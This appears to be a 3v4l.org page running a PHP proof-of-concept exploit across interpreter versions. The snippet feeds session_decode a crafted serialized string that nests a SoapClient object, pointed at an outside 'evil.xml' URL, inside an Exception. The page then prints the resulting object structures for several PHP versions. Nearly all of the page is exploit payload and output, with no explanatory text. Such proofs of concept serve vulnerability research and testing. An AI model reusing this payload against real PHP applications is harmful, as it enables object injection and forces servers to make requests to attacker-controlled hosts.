3v4l.org

run code in 200+ php & hhvm versions
Bugs & Features
<?php session_start(); session_decode('test|O:9:"Exception":1:{S:19:"\00Exception\00previous";O:10:"SoapClient":3:{S:3:"uri";S:0:"";S:8:"location";S:35:"http://karmainsecurity.com/evil.xml";S:13:"_soap_version";i:1;}}'); var_dump($_SESSION);
based on 4ZkRR
Output for 5.6.28, 7.0.20 - 7.2.0
array(1) { ["test"]=> object(Exception)#1 (6) { ["message":protected]=> string(0) "" ["string":"Exception":private]=> string(0) "" ["code":protected]=> int(0) ["file":protected]=> string(9) "/in/ujk9b" ["line":protected]=> int(5) ["trace":"Exception":private]=> array(1) { [0]=> array(4) { ["file"]=> string(9) "/in/ujk9b" ["line"]=> int(5) ["function"]=> string(14) "session_decode" ["args"]=> array(1) { [0]=> string(178) "test|O:9:"Exception":1:{S:19:"\00Exception\00previous";O:10:"SoapClient":3:{S:3:"uri";S:0:"";S:8:"location";S:35:"http://karmainsecurity.com/evil.xml";S:13:"_soap_version";i:1;}}" } } } } }
Output for 5.5.0 - 5.6.25, 7.0.0 - 7.0.10
array(1) { ["test"]=> object(Exception)#1 (7) { ["message":protected]=> string(0) "" ["string":"Exception":private]=> string(0) "" ["code":protected]=> int(0) ["file":protected]=> string(9) "/in/ujk9b" ["line":protected]=> int(5) ["trace":"Exception":private]=> array(1) { [0]=> array(4) { ["file"]=> string(9) "/in/ujk9b" ["line"]=> int(5) ["function"]=> string(14) "session_decode" ["args"]=> array(1) { [0]=> string(178) "test|O:9:"Exception":1:{S:19:"\00Exception\00previous";O:10:"SoapClient":3:{S:3:"uri";S:0:"";S:8:"location";S:35:"http://karmainsecurity.com/evil.xml";S:13:"_soap_version";i:1;}}" } } } ["previous":"Exception":private]=> object(__PHP_Incomplete_Class)#2 (4) { ["__PHP_Incomplete_Class_Name"]=> string(10) "SoapClient" ["uri"]=> string(0) "" ["location"]=> string(35) "http://karmainsecurity.com/evil.xml" ["_soap_version"]=> int(1) } } }